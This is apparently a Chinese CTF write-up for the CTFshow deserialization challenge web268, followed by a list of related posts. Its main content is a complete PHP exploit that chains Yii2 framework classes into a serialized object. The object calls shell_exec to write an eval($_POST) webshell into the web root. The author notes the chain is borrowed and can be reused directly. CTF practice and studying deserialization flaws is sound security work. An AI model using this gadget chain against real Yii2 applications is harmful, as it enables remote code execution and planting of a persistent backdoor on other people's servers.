CTFshow 反序列化 web268
目录
- 思路
- 题解
- 总结
思路
发现这题和上题一样的,用之前的链子发现什么回显也没有,可能这个链子用不了了,就直接拿群里的吧
题解
exp
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-05-03 21:55:29
# @Last Modified by: h1xa
# @Last Modified time: 2021-05-04 01:25:28
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/
namespace yii\rest {class Action{public $checkAccess;}class IndexAction{public function __construct($func, $param){$this->checkAccess = $func;$this->id = $param;}}
}
namespace yii\web {abstract class MultiFieldSession{public $writeCallback;}class DbSession extends MultiFieldSession{public function __construct($func, $param){$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];}}
}
namespace yii\db {use yii\base\BaseObject;class BatchQueryResult{private $_dataReader;public function __construct($func, $param){$this->_dataReader = new \yii\web\DbSession($func, $param);}}
}
namespace {$exp = new \yii\db\BatchQueryResult('shell_exec', 'echo "<?php eval(\$_POST[1]);phpinfo();?>" >/var/www/html/basic/web/1.php');echo(base64_encode(serialize($exp)));
}
?>总结
以后可以直接拿来用
CTFshow 反序列化 web268相关推荐
- CTFshow 反序列化 web266
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # ...
- CTFshow 反序列化 web259
目录 源码 思路 题解 总结 源码 <?phphighlight_file(__FILE__);$vip = unserialize($_GET['vip']); //vip can get f ...
- ctfshow 反序列化篇(下)
web267(yii框架) 开启靶机,是一个网站,试着搜索有没有重要信息.在这里发现是yii框架. 我们使用弱口令admin/admin就可以登录进来了,那就继续收集重要信息.在源代码中发现了重要注释 ...
- CTFshow 反序列化 web277
目录 源码 题解 总结 源码 查看源代码 提示pickle,得知考点是pickle反序列化 题解 exp 试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上 ...
- CTFshow 反序列化 web261
目录 源码 思路 题解 总结 源码 <?phphighlight_file(__FILE__);class ctfshowvip{public $username;public $passwor ...
- CTFshow 反序列化 web260
目录 源码 思路 题解 总结 源码 <?phperror_reporting(0); highlight_file(__FILE__); include('flag.php');if(preg_ ...
- CTFshow 反序列化 web262
目录 源码 思路 题解 解法一 直接构造类进行序列化 解法二 字符逃逸 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date ...
- CTFshow 反序列化 web263
目录 源码 思路 题解 总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处 ...
- CTFshow 反序列化 web258
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # ...
最新文章
- mysql的安装和启动_mysql安装和启动
- Devexpress TreeList控件绑定显示父子节点对像
- Vue的内容分发slot的使用
- [芯片] 2、接口技术·实验二·定时/计数器8253
- JavaSE----属性、方法
- C语言字符串操作总结大全(超详细)
- Qt窗口部件——QWidget
- macbookpro bootcamp win10 蓝牙鼠标卡顿解决方案
- 用Java实现Md5加密工具类
- 计算机二级c简介,二级C语言
- Office:手动卸载 Office 系统
- linux系统被×××后处理经历
- Java核心(集合类1-概述、Collection 接口 、List 集合)
- STM32Cubemx的安装及用寄存器HAL库完成LED流水灯程序
- 【全角/半角是什么】关于全角和半角的区别和使用
- FFmpeg系列(四)—— mp4音视频流分离
- Oracle 无备份情况恢复ocr和olr
- 真心话大冒险小程序python实现
- 揭秘卫星互联网!6G关键技术,国内行业雏形初现
- 7.4 小团队、低成本的管理实践之路